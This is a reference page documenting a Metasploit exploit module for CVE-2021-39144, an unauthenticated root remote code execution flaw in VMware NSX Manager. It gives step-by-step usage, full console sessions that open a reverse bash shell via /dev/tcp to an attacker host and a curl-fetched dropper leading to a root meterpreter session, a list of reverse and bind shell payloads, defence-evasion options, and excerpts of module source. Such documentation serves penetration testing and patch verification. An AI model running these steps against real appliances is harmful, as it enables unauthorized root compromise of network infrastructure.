VMware NSX Manager XStream unauthenticated RCE - Metasploit


This page contains detailed information about how to use the exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144 metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: VMware NSX Manager XStream unauthenticated RCE
Module: exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144
Source code: modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb
Disclosure date: 2022-10-25
Last modification time: 2022-11-12 10:21:43 +0000
Supported architecture(s): cmd, x86, x64
Supported platform(s): Linux, Unix
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2021-39144

VMware Cloud Foundation (NSX-V) contains a remote code execution vulnerability via XStream open source library. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V), a malicious actor can get remote code execution in the context of 'root' on the appliance. VMware Cloud Foundation 3.x and more specific NSX Manager Data Center for vSphere up to and including version 6.4.13 are vulnerable to Remote Command Injection. This module exploits the vulnerability to upload and execute payloads gaining root privileges.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
  • artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.

Basic Usage


msf > use exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144
msf exploit(vmware_nsxmgr_xstream_rce_cve_2021_39144) > exploit

Required Options


  • RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit

Knowledge Base


Vulnerable Application


VMware Cloud Foundation contains a remote code execution vulnerability via XStream open source library CVE-2022-39144. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V), a malicious actor can get remote code execution in the context of root on the appliance.

VMware Cloud Foundation 3.x and more specific NSX Manager Data Center for vSphere up to and including version 6.4.13 are vulnerable to Remote Command Injection.

This module has been tested against VMware NSX Manager (NSX-V) with the specifications listed below:

  • VMware NSX Manager
  • Version 6.4.13
  • Version 6.4.4

Verification Steps


Follow these instructions to install a vulnerable VMware NSX Manager on VirtualBox. * Go to Download VMware NSX for vSphere 6.4.13 * Note: You need to be a customer with valid VMware subscriptions * Download the ova file VMware-NSX-Manager-6.4.13-19307994.ova * Open VirtualBox and import the ova file * After sucessful import, start the VM and you have a VMware NSX Manager running which is accessible using url https://<nsx-manager-ip> * Credentials to login: user: admin, password: default * Use the module and options below to test the vulnerability...

  1. use use exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144
  2. set RHOSTS <TARGET HOSTS>
  3. set RPORT <port>
  4. set LHOST <attacker host ip>
  5. set LPORT <attacker host port>
  6. set TARGET <0-Unix command or 1-Linux Dropper>
  7. exploit
  8. You should get a bash shell or meterpreter session depending on the target and payload settings.

Options


No specific options.

Scenarios


VMware NSX Manager bash reverse shell

msf6 > use exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > options

Module options (exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    443              yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machi
                                       ne or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix (In-Memory)


msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > set rhosts 192.168.100.5
rhosts => 192.168.100.5
msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > set lhost 192.168.100.7
lhost => 192.168.100.7
msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > exploit

[*] Started reverse TCP handler on 192.168.100.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.100.5:443 can be exploited !
[+] The target appears to be vulnerable. Target is running VMware NSX Manager (NSX-V)
[*] Executing Unix (In-Memory) with bash -c '0<&44-;exec 44<>/dev/tcp/192.168.100.7/4444;sh <&44 >&44 2>&44'
[*] Command shell session 14 opened (192.168.100.7:4444 -> 192.168.100.5:42512) at 2022-11-05 10:33:37 +0000

pwd
/usr/lib/tanuki/bin
whoami
root
exit
[*] 192.168.100.5 - Command shell session 14 closed.

VMware NSX Manager meterpreter session

msf6 > use exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > options

Module options (exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    443              yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machi
                                       ne or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper


msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > set rhosts 192.168.100.5
rhosts => 192.168.100.5
msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > set lhost 192.168.100.7
lhost => 192.168.100.7
msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > exploit

[*] Started reverse TCP handler on 192.168.100.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.100.5:443 can be exploited !
[+] The target appears to be vulnerable. Target is running VMware NSX Manager (NSX-V)
[*] Executing Linux Dropper
[*] Using URL: http://192.168.100.7:8080/G5xrKmpiufcQdCt
[*] Client 192.168.100.5 (curl/7.81.0) requested /G5xrKmpiufcQdCt
[*] Sending payload to 192.168.100.5 (curl/7.81.0)
[*] Command Stager progress - 100.00% done (121/121 bytes)
[*] Sending stage (3045348 bytes) to 192.168.100.5
[*] Meterpreter session 13 opened (192.168.100.7:4444 -> 192.168.100.5:42384) at 2022-11-05 10:29:30 +0000
[*] Server stopped.

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.100.5
OS           : NSX Manager 6.4.13 (Linux 4.9.297)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

Limitations


The vulnerability check is limited in detecting that VMWare NSX Manager (NSX-V) is running without obtaining the version information. However all VMware NSX Manager versions up to 6.4.13 are vulnerable, except for 6.4.14, so most detected targets are likely to be vulnerable.

Go back to menu.

Msfconsole Usage


Here is how the linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144 exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144

[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > show info

       Name: VMware NSX Manager XStream unauthenticated RCE
     Module: exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144
   Platform: Unix, Linux
       Arch: cmd, x86, x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2022-10-25

Provided by:
  h00die-gr3y
  Sina Kheirkhah
  Steven Seeley

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Unix (In-Memory)
  1   Linux Dropper

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT    443              yes       The target port (TCP)
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addr
                                      esses.
  SRVPORT  8080             yes       The local port to listen on.
  SSL      true             no        Negotiate SSL/TLS for outgoing connections
  SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                   no        The URI to use for this exploit (default is random)
  VHOST                     no        HTTP server virtual host

Payload information:

Description:
  VMware Cloud Foundation (NSX-V) contains a remote code execution 
  vulnerability via XStream open source library. VMware has evaluated 
  the severity of this issue to be in the Critical severity range with 
  a maximum CVSSv3 base score of 9.8. Due to an unauthenticated 
  endpoint that leverages XStream for input serialization in VMware 
  Cloud Foundation (NSX-V), a malicious actor can get remote code 
  execution in the context of 'root' on the appliance. VMware Cloud 
  Foundation 3.x and more specific NSX Manager Data Center for vSphere 
  up to and including version 6.4.13 are vulnerable to Remote Command 
  Injection. This module exploits the vulnerability to upload and 
  execute payloads gaining root privileges.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2021-39144
  https://www.vmware.com/security/advisories/VMSA-2022-0027.html
  https://kb.vmware.com/s/article/89809
  https://srcincite.io/blog/2022/10/25/eat-what-you-kill-pre-authenticated-rce-in-vmware-nsx-manager.html
  https://attackerkb.com/topics/ngprN6bu76/cve-2021-39144

View the full module info with the info -d command.

Module Options


This is a complete list of options available in the linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144 exploit:

msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > show options

Module options (exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    443              yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all add
                                       resses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host

Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Unix (In-Memory)


View the full module info with the info, or info -d command.

Advanced Options


Here is a complete list of advanced options supported by the linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144 exploit:

msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > show advanced

Module advanced options (exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144):

   Name                     Current Setting                               Required  Description
   ----                     ---------------                               --------  -----------
   AutoCheck                true                                          no        Run check before exploit
   CMDSTAGER::DECODER                                                     no        The decoder stub to use.
   CMDSTAGER::FLAVOR        auto                                          no        The CMD Stager to use. (Accepted: auto, curl, printf)
   CMDSTAGER::SSL           false                                         no        Use SSL/TLS for supported stagers
   CMDSTAGER::TEMP                                                        no        Writable directory for staged files
   CMDSTAGER::URIPATH                                                     no        Payload URI path for supported stagers
   ContextInformationFile                                                 no        The information file that contains context information
   DOMAIN                   WORKSTATION                                   yes       The domain to use for Windows authentication
   DigestAuthIIS            true                                          no        Conform to IIS, should work for most servers. Only set to false for non-IIS serve
                                                                                    rs
   DisablePayloadHandler    false                                         no        Disable the handler code for the selected payload
   EXE::Custom                                                            no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR               false                                         no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack            false                                         no        Use the default template in case the specified one is missing
   EXE::Inject              false                                         no        Set to preserve the original EXE function
   EXE::OldMethod           false                                         no        Set to use the substitution EXE generation method.
   EXE::Path                                                              no        The directory in which to look for the executable template
   EXE::Template                                                          no        The executable template file name.
   EnableContextEncoding    false                                         no        Use transient context when encoding payloads
   FingerprintCheck         true                                          no        Conduct a pre-exploit fingerprint verification
   ForceExploit             false                                         no        Override check result
   HttpClientTimeout                                                      no        HTTP connection and receive timeout
   HttpPassword                                                           no        The HTTP password to specify for authentication
   HttpRawHeaders                                                         no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace                false                                         no        Show the raw HTTP requests and responses
   HttpTraceColors          red/blu                                       no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly     false                                         no        Show HTTP headers only in HttpTrace
   HttpUsername                                                           no        The HTTP username to specify for authentication
   ListenerBindAddress                                                    no        The specific IP address to bind to if different from SRVHOST
   ListenerBindPort                                                       no        The port to bind to if different from SRVPORT
   ListenerComm                                                           no        The specific communication channel to use for this service
   MSI::Custom                                                            no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR               false                                         no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                                              no        The directory in which to look for the msi template
   MSI::Template                                                          no        The msi template file name
   MSI::UAC                 false                                         no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   SSLCipher                                                              no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression           false                                         no        Enable SSL/TLS-level compression
   SSLServerNameIndication                                                no        SSL/TLS Server Name Indication (SNI)
   SSLVersion               Auto                                          yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate
                                                                                    ) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   SendRobots               false                                         no        Return a robots.txt file if asked for one
   URIHOST                                                                no        Host to use in URI (useful for tunnels)
   URIPORT                                                                no        Port to use in URI (useful for tunnels)
   UserAgent                Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv  no        The User-Agent header to use for all requests
                            :97.0) Gecko/20100101 Firefox/97.0
   VERBOSE                  false                                         no        Enable detailed status messages
   WORKSPACE                                                              no        Specify the workspace for this module
   WfsDelay                 2                                             no        Additional delay in seconds to wait for a session

Payload advanced options (cmd/unix/reverse_bash):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

View the full module info with the info, or info -d command.

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144 module can exploit:

msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Unix (In-Memory)
   1   Linux Dropper

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144 exploit:

msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > show payloads

Compatible Payloads
===================

   #   Name                                                  Disclosure Date  Rank    Check  Description
   -   ----                                                  ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_awk                                              normal  No     Unix Command Shell, Bind TCP (via AWK)
   1   payload/cmd/unix/bind_busybox_telnetd                                  normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   2   payload/cmd/unix/bind_inetd                                            normal  No     Unix Command Shell, Bind TCP (inetd)
   3   payload/cmd/unix/bind_jjs                                              normal  No     Unix Command Shell, Bind TCP (via jjs)
   4   payload/cmd/unix/bind_lua                                              normal  No     Unix Command Shell, Bind TCP (via Lua)
   5   payload/cmd/unix/bind_netcat                                           normal  No     Unix Command Shell, Bind TCP (via netcat)
   6   payload/cmd/unix/bind_netcat_gaping                                    normal  No     Unix Command Shell, Bind TCP (via netcat -e)
   7   payload/cmd/unix/bind_netcat_gaping_ipv6                               normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
   8   payload/cmd/unix/bind_nodejs                                           normal  No     Unix Command Shell, Bind TCP (via nodejs)
   9   payload/cmd/unix/bind_perl                                             normal  No     Unix Command Shell, Bind TCP (via Perl)
   10  payload/cmd/unix/bind_perl_ipv6                                        normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   11  payload/cmd/unix/bind_r                                                normal  No     Unix Command Shell, Bind TCP (via R)
   12  payload/cmd/unix/bind_ruby                                             normal  No     Unix Command Shell, Bind TCP (via Ruby)
   13  payload/cmd/unix/bind_ruby_ipv6                                        normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   14  payload/cmd/unix/bind_socat_udp                                        normal  No     Unix Command Shell, Bind UDP (via socat)
   15  payload/cmd/unix/bind_stub                                             normal  No     Unix Command Shell, Bind TCP (stub)
   16  payload/cmd/unix/bind_zsh                                              normal  No     Unix Command Shell, Bind TCP (via Zsh)
   17  payload/cmd/unix/generic                                               normal  No     Unix Command, Generic Command Execution
   18  payload/cmd/unix/pingback_bind                                         normal  No     Unix Command Shell, Pingback Bind TCP (via netcat)
   19  payload/cmd/unix/pingback_reverse                                      normal  No     Unix Command Shell, Pingback Reverse TCP (via netcat)
   20  payload/cmd/unix/python/meterpreter/bind_tcp                           normal  No     Python Exec, Python Meterpreter, Python Bind TCP Stager
   21  payload/cmd/unix/python/meterpreter/bind_tcp_uuid                      normal  No     Python Exec, Python Meterpreter, Python Bind TCP Stager with UUID Support
   22  payload/cmd/unix/python/meterpreter/reverse_http                       normal  No     Python Exec, Python Meterpreter, Python Reverse HTTP Stager
   23  payload/cmd/unix/python/meterpreter/reverse_https                      normal  No     Python Exec, Python Meterpreter, Python Reverse HTTPS Stager
   24  payload/cmd/unix/python/meterpreter/reverse_tcp                        normal  No     Python Exec, Python Meterpreter, Python Reverse TCP Stager
   25  payload/cmd/unix/python/meterpreter/reverse_tcp_ssl                    normal  No     Python Exec, Python Meterpreter, Python Reverse TCP SSL Stager
   26  payload/cmd/unix/python/meterpreter/reverse_tcp_uuid                   normal  No     Python Exec, Python Meterpreter, Python Reverse TCP Stager with UUID Support
   27  payload/cmd/unix/python/meterpreter_bind_tcp                           normal  No     Python Exec, Python Meterpreter Shell, Bind TCP Inline
   28  payload/cmd/unix/python/meterpreter_reverse_http                       normal  No     Python Exec, Python Meterpreter Shell, Reverse HTTP Inline
   29  payload/cmd/unix/python/meterpreter_reverse_https                      normal  No     Python Exec, Python Meterpreter Shell, Reverse HTTPS Inline
   30  payload/cmd/unix/python/meterpreter_reverse_tcp                        normal  No     Python Exec, Python Meterpreter Shell, Reverse TCP Inline
   31  payload/cmd/unix/python/pingback_bind_tcp                              normal  No     Python Exec, Python Pingback, Bind TCP (via python)
   32  payload/cmd/unix/python/pingback_reverse_tcp                           normal  No     Python Exec, Python Pingback, Reverse TCP (via python)
   33  payload/cmd/unix/python/shell_bind_tcp                                 normal  No     Python Exec, Command Shell, Bind TCP (via python)
   34  payload/cmd/unix/python/shell_reverse_tcp                              normal  No     Python Exec, Command Shell, Reverse TCP (via python)
   35  payload/cmd/unix/python/shell_reverse_tcp_ssl                          normal  No     Python Exec, Command Shell, Reverse TCP SSL (via python)
   36  payload/cmd/unix/python/shell_reverse_udp                              normal  No     Python Exec, Command Shell, Reverse UDP (via python)
   37  payload/cmd/unix/reverse                                               normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   38  payload/cmd/unix/reverse_awk                                           normal  No     Unix Command Shell, Reverse TCP (via AWK)
   39  payload/cmd/unix/reverse_bash                                          normal  No     Unix Command Shell, Reverse TCP (/dev/tcp)
   40  payload/cmd/unix/reverse_bash_telnet_ssl                               normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   41  payload/cmd/unix/reverse_bash_udp                                      normal  No     Unix Command Shell, Reverse UDP (/dev/udp)
   42  payload/cmd/unix/reverse_jjs                                           normal  No     Unix Command Shell, Reverse TCP (via jjs)
   43  payload/cmd/unix/reverse_ksh                                           normal  No     Unix Command Shell, Reverse TCP (via Ksh)
   44  payload/cmd/unix/reverse_lua                                           normal  No     Unix Command Shell, Reverse TCP (via Lua)
   45  payload/cmd/unix/reverse_ncat_ssl                                      normal  No     Unix Command Shell, Reverse TCP (via ncat)
   46  payload/cmd/unix/reverse_netcat                                        normal  No     Unix Command Shell, Reverse TCP (via netcat)
   47  payload/cmd/unix/reverse_netcat_gaping                                 normal  No     Unix Command Shell, Reverse TCP (via netcat -e)
   48  payload/cmd/unix/reverse_nodejs                                        normal  No     Unix Command Shell, Reverse TCP (via nodejs)
   49  payload/cmd/unix/reverse_openssl                                       normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
   50  payload/cmd/unix/reverse_perl                                          normal  No     Unix Command Shell, Reverse TCP (via Perl)
   51  payload/cmd/unix/reverse_perl_ssl                                      normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   52  payload/cmd/unix/reverse_php_ssl                                       normal  No     Unix Command Shell, Reverse TCP SSL (via php)
   53  payload/cmd/unix/reverse_python                                        normal  No     Unix Command Shell, Reverse TCP (via Python)
   54  payload/cmd/unix/reverse_python_ssl                                    normal  No     Unix Command Shell, Reverse TCP SSL (via python)
   55  payload/cmd/unix/reverse_r                                             normal  No     Unix Command Shell, Reverse TCP (via R)
   56  payload/cmd/unix/reverse_ruby                                          normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   57  payload/cmd/unix/reverse_ruby_ssl                                      normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   58  payload/cmd/unix/reverse_socat_udp                                     normal  No     Unix Command Shell, Reverse UDP (via socat)
   59  payload/cmd/unix/reverse_ssh                                           normal  No     Unix Command Shell, Reverse TCP SSH
   60  payload/cmd/unix/reverse_ssl_double_telnet                             normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
   61  payload/cmd/unix/reverse_stub                                          normal  No     Unix Command Shell, Reverse TCP (stub)
   62  payload/cmd/unix/reverse_tclsh                                         normal  No     Unix Command Shell, Reverse TCP (via Tclsh)
   63  payload/cmd/unix/reverse_zsh                                           normal  No     Unix Command Shell, Reverse TCP (via Zsh)
   64  payload/generic/custom                                                 normal  No     Custom Payload
   65  payload/generic/shell_bind_tcp                                         normal  No     Generic Command Shell, Bind TCP Inline
   66  payload/generic/shell_reverse_tcp                                      normal  No     Generic Command Shell, Reverse TCP Inline
   67  payload/generic/ssh/interact                                           normal  No     Interact with Established SSH Connection

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144 exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::chunked                 false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression             none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::junk_headers            false            no        Enable insertion of random junk HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::no_cache                false            no        Disallow the browser to cache HTTP content
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::server_name             Apache           yes       Configures the Server header of all outgoing replies
   HTTP::shuffle_get_params      false            no        Randomize order of GET parameters
   HTTP::shuffle_post_params     false            no        Randomize order of POST parameters
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-r
                                                            andom)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
   TCP::max_send_size            0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay               0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<PEER> - Communication error occurred: <E.MESSAGE>


Here is a relevant code snippet related to the "<PEER> - Communication error occurred: <E.MESSAGE>" error message:

85:	    return send_request_cgi({
86:	      'method' => 'GET',
87:	      'uri' => normalize_uri(target_uri.path, 'login.jsp')
88:	    })
89:	  rescue StandardError => e
90:	    elog("#{peer} - Communication error occurred: #{e.message}", error: e)
91:	    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")
92:	  end
93:	
94:	  def execute_command(cmd, _opts = {})
95:	    b64 = Rex::Text.encode_base64(cmd)

Communication error occurred: <E.MESSAGE>


Here is a relevant code snippet related to the "Communication error occurred: <E.MESSAGE>" error message:

86:	      'method' => 'GET',
87:	      'uri' => normalize_uri(target_uri.path, 'login.jsp')
88:	    })
89:	  rescue StandardError => e
90:	    elog("#{peer} - Communication error occurred: #{e.message}", error: e)
91:	    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")
92:	  end
93:	
94:	  def execute_command(cmd, _opts = {})
95:	    b64 = Rex::Text.encode_base64(cmd)
96:	    random_uri = rand_text_alphanumeric(4..10)

<PEER> - Communication error occurred: <E.MESSAGE>


Here is a relevant code snippet related to the "<PEER> - Communication error occurred: <E.MESSAGE>" error message:

118:	      'ctype' => 'application/xml',
119:	      'uri' => normalize_uri(target_uri.path, 'api', '2.0', 'services', 'usermgmt', 'password', random_uri),
120:	      'data' => xml_payload
121:	    })
122:	  rescue StandardError => e
123:	    elog("#{peer} - Communication error occurred: #{e.message}", error: e)
124:	    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")
125:	  end
126:	
127:	  # Checking if the target is potential vulnerable checking the http title "VMware Appliance Management"
128:	  # that indicates the target is running VMware NSX Manager (NSX-V)

Communication error occurred: <E.MESSAGE>


Here is a relevant code snippet related to the "Communication error occurred: <E.MESSAGE>" error message:

119:	      'uri' => normalize_uri(target_uri.path, 'api', '2.0', 'services', 'usermgmt', 'password', random_uri),
120:	      'data' => xml_payload
121:	    })
122:	  rescue StandardError => e
123:	    elog("#{peer} - Communication error occurred: #{e.message}", error: e)
124:	    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")
125:	  end
126:	
127:	  # Checking if the target is potential vulnerable checking the http title "VMware Appliance Management"
128:	  # that indicates the target is running VMware NSX Manager (NSX-V)
